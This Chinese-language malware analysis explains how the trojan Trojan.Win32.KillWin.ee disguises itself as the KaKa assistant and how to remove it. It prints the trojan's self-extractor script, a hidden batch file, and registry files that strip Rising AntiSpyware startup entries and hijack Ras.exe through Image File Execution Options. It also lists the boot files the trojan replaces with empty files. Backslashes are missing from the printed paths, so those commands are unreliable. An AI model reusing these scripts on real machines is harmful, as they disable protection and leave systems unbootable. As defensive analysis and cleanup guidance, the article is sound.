病毒日新月异的今天,越来越多的伪装及新型变种是一天接一天的疯狂,面对如此情况,很多网民是只能一次又一次的进行系统还原或者是重装系统。而安全软件在此时却显得力不从心,因为很多病毒木马在发作前都开始解除安软的保护功能,这不新出现的Trojan.Win32.KillWin.ee也具备此种功能。
病毒分析
该病毒名为Trojan.Win32.KillWin.ee,文件虽然只有小小的169 KB(173,614 字节),但其威力却不容小视。病毒为WINRAR自解压缩包格式,可通过修改自身图标为卡卡助手的标识来进行伪装自身。当病毒进驻到用户计算机后,会释放BAT和REG命令的执行文件,并利用命令方式删除用户计算机中的卡卡助手启动项,禁止其真实的程序启动,然后通过劫持卡卡的主程序并将其指向病毒主体gameover.exe程序。
该程序在使用自动解压缩命令解压自身后开始进行系统破坏,其自解压命令如下:
Path=%SystemRoot%system32
SavePath
Setup=hidecmd.exe kv.bat
Silent=1
Overwrite=1
执行hidecmd.exe(隐藏执行BAT)用参数调用kv.bat隐藏执行。
kv.bat的内容为:
@echo off
%SystemRoot% egedit /s kaka.reg
%SystemRoot% egedit /s gameover.reg
Exit
病毒修改注册表
在结束上述命令后,病毒源体开始接着导入到系统中两个REG文件,来修改注册表,其内容如下:
kaka.reg:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"KKDelay"="C:Program FilesRisingAntiSpywareRunOnce.exe"
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"runeip"=""C:Program FilesRisingAntiSpywareruniep.exe" /startup"
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponents]
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsIMAIL]
"Installed"="1"
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMAPI]
"Installed"="1"
"NoChange"="1"
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMSFS]
"Installed"="1"
病毒删除卡卡助手
到此时病毒依然没有停手,其开始查找并删除卡卡助手的相关启动,其内容如下:
gameover.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRas.exe]
"Debugger"="C:winntsystem32gameover.exe"
从而进行劫持卡卡主程序并将其指向释放的病毒。
小提示:从这里%SystemRoot%system32可以看出作者针对的是WIN2K系列,因为刚才的WINRAR释放脚本使用的是环境变量,只有在WIN2K系列操作平台中才是WINNT文件夹,而在XP里是Windowssystem32,所以这个劫持指向无效。
重要注释
%System32%是一个可变路径,病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32,Windows95/98/me中默认的安装路径是C:WindowsSystem,WindowsXP中默认的安装路径是C:WindowsSystem32。
%Temp% = C:Documents and SettingsAAAAALocal SettingsTemp 当前用户TEMP缓存变量
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% = C: 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
破坏系统的gameover.exe
病毒在对卡卡劫持后,开始进行下一步活动,在系统中放入gameover.exe程序进行系统破坏。其实gameover.exe也是一个自解压缩包,内含自解压脚本命令如下:
Path=C:
SavePath
Silent=1
Overwrite=1
释放了0字节的同名空文件替换以下系统文件,破坏系统启动:
AUTOEXEC.BAT
boot.ini
bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
Ntldr
清除病毒
普通用户可通过系统镜像还原实现系统恢复,而对于有一定基础的网民来说,可以系统光盘中复制上述的系统文件进行修复操作系统平台。在查找文件时可以用DIR命令来查找其相关位置,如:首先进入光盘的盘符,然后输入:DIR Autoexe.bat,系统会将此路径下的Autoexe.bat文件的位置显示出来,然后再进行复制文件,其命令格式如下:
COPY_源路径_目标路径(其中_为空格),比如:“COPY_X:autoexe.bat_C:”就表示将X盘根目录下的Autoexe.bat文件拷贝到C盘根目录下。
然后删除系统目录%SystemRoot%system32下的gameover.exe文件即可,最后进行杀毒软件的升级与全盘杀毒,以防另类感染。
编者按:病毒虽然有其入驻破坏之道,但只要掌握其原理,在了解其运行过程与所添加的注册表项目后,即可轻而易举的将其清除出系统之外,还平台一个安全的环境。
